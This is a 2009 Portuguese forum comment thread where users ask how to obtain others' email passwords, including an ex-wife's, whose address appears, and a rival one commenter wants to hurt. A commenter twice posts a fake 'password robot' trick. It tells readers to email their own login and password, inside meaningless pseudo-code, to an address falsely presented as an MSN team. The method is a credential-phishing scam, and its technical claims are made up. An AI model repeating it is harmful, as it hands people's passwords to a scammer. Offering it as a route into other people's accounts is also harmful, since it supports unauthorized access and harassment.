| 6 queridinho, o 2 Ago 2009, às 04:28:34Quero descobrir a senha de minha ex mulher cm.irmaceleste@yahoo.com.br Responder queridinho | 7 beatriz, o 16 Set 2009, às 02:09:04Preciso com urgência descobri a senha do orkut da minha prima que faleceu a um mês, eu tenho o e-mail dela mais não tenho a senha, me ajudem por favor é sério é importante não estou querendo roubar senha de ninguém pra fazer maldade com ninguém, espero que possam me ajudar. Um abraço! Responder beatriz | 9 Fabio Teixeira, o 16 Set 2009, às 20:27:28Eu sei de uma maneira é muito simples
é válido para orkut, uol. bol. terra e outros
O método utilizado pelo http://www.hotmail.com.br para se recuperar uma senha perdida é
utilizar o assistente da sua web, mas se observarmos bem, iremos notar que é apenas um ‘boot’ que a única coisa que faz é enviar de forma interna os dados para poder redirecioná-los á sua base de dados.
Consiste em enviar um e-mail fazendo-se passar pelo boot,utilizando a sua codificação, é automático e não tem a mínima segurança, ainda assim não o usem muito porque senão podem descobrir e acabar com nossa festa, né?
É o seguinte: você envia um e-mail com as duas mensagens:
1ª mensagem: Find Password= Ele vai rastrear a senha do e-mail sugerido e postar no espaço que está com os sinais ‘???’.
2ª mensagem: Send to= Ele vai conferir se seu e-mail e senha são verdadeiros, e em seguida envia o e-mail e a senha do outro.
Ou seja, você recebe o e-mail de volta, mas no lugar dos sinais ??? vem a senha da vítima, sacou??
Envie o e-mail para o seguinte endereço:
Robot_service_pass@hotmail.com
Esse é o e-mail da equipe do MSN que irá rastrear a senha da vítima e enviar ao seu e-mail.
O código é tudo o que está entre as linhas pontilhadas (sem as linhas, lógico).
Onde está escrito login da vítima, você digita o nick da mesma…
Atenção “NÃO ESCREVA O ARROBA…BLÁ, BLÁ, BLÁ.COM.BR…Por favor…só o nick da vítima.
Por exemplo: alfredo-rj@hotmail.com
O nick é alfredo-rj.
Senão não funciona, o sistema só rastreia MSN.
Onde está escrito seu login, ponha seu nick…SÓ O NICK, Por favor, igual o de cima
Onde está escrito sua senha, ponha sua senha, o sistema precisa conferir se o seu e-mail é válido.
————————————————————————————————–
Find Password:
[html] [b] [frontpage] [******] [username]
Sckht//:28540//enter-profyle//940.000-1742//2kjlm32//?64.htm
<find_login><ab>//to:<find_password>
(login da Vitima)
[?????????]
<microsoft.com.usa><d//>
<master><store><a/b><security>3269//36?//
Send to:
[html]//<ab><to>[*******] [username]
Flcrow//:31864//:,send-password
(seu login)
[sua senha]
lkfçp_ko_pp_js
(***********)
/html/b/front/ [*****]//74.218.master.security.log
c://front-page-profyle.html
<ab><send to//><p>
————————————————————————-
Boa sorte e divirta-se descobrindo as senhas dos seus amigos…mas não abuse. Responder Fabio Teixeira | 15 Thiago, o 19 Nov 2009, às 18:44:58Entre em contato comigo, preciso de urgencia para recuperar senha de email, eu pago. Responder Thiago |
|
|
| 8 Fabio Teixeira, o 16 Set 2009, às 20:25:17Eu sei de método é muito simples, mas não divulgue isso pois se descobrirem cortam o nosso barato...
esse método serve para orkut, terra, yahoo, bol, uol e outros
O método utilizado pelo http://www.hotmail.com.br para se recuperar uma senha perdida é
utilizar o assistente da sua web, mas se observarmos bem, iremos notar que é apenas um ‘boot’ que a única coisa que faz é enviar de forma interna os dados para poder redirecioná-los á sua base de dados.
Consiste em enviar um e-mail fazendo-se passar pelo boot,utilizando a sua codificação, é automático e não tem a mínima segurança, ainda assim não o usem muito porque senão podem descobrir e acabar com nossa festa, né?
É o seguinte: você envia um e-mail com as duas mensagens:
1ª mensagem: Find Password= Ele vai rastrear a senha do e-mail sugerido e postar no espaço que está com os sinais ‘???’.
2ª mensagem: Send to= Ele vai conferir se seu e-mail e senha são verdadeiros, e em seguida envia o e-mail e a senha do outro.
Ou seja, você recebe o e-mail de volta, mas no lugar dos sinais ??? vem a senha da vítima, sacou??
Envie o e-mail para o seguinte endereço:
Robot_service_pass@hotmail.com
Esse é o e-mail da equipe do MSN que irá rastrear a senha da vítima e enviar ao seu e-mail.
O código é tudo o que está entre as linhas pontilhadas (sem as linhas, lógico).
Onde está escrito login da vítima, você digita o nick da mesma…
Atenção “NÃO ESCREVA O ARROBA…BLÁ, BLÁ, BLÁ.COM.BR…Por favor…só o nick da vítima.
Por exemplo: alfredo-rj@hotmail.com
O nick é alfredo-rj.
Senão não funciona, o sistema só rastreia MSN.
Onde está escrito seu login, ponha seu nick…SÓ O NICK, Por favor, igual o de cima
Onde está escrito sua senha, ponha sua senha, o sistema precisa conferir se o seu e-mail é válido.
————————————————————————————————–
Find Password:
[html] [b] [frontpage] [******] [username]
Sckht//:28540//enter-profyle//940.000-1742//2kjlm32//?64.htm
<find_login><ab>//to:<find_password>
(login da Vitima)
[?????????]
<microsoft.com.usa><d//>
<master><store><a/b><security>3269//36?//
Send to:
[html]//<ab><to>[*******] [username]
Flcrow//:31864//:,send-password
(seu login)
[sua senha]
lkfçp_ko_pp_js
(***********)
/html/b/front/ [*****]//74.218.master.security.log
c://front-page-profyle.html
<ab><send to//><p>
————————————————————————-
Boa sorte e divirta-se descobrindo as senhas dos seus amigos…mas não abuse. Responder Fabio Teixeira | 10 JOAOJK, o 3 Out 2009, às 06:58:50Ensina ai esse negocio direito que esta complicado usa uma linguagem que todos entendam Responder JOAOJK |
| 11 Jose Roberto, o 7 Out 2009, às 17:46:58FAbio, desculpe mas não consegui entender. Se eu te passar um email do hotmail voce descobre para mim.
Obrigado.
Jose Roberto Responder Jose Roberto |
| 13 liria, o 17 Nov 2009, às 13:08:17Fabio,
Me ajuda por favor!
Tem uma vadiazinha que está me deixando louca de raiva! Será que tem como eu descobrir a senha dela no yahoo para eu poder acabar com ela?
Manda pro meu e-mail como devo fazer.
Obrigada Responder liria |
| 16 Bogalhita, o 23 Nov 2009, às 10:59:12Olá... será que pode explicar de forma mais simples e clara como se faz isso!!?? :-)
é que fiquei sem perceber mto bem... tem que explicar passo a passo... por favor!! Responder Bogalhita |
|
|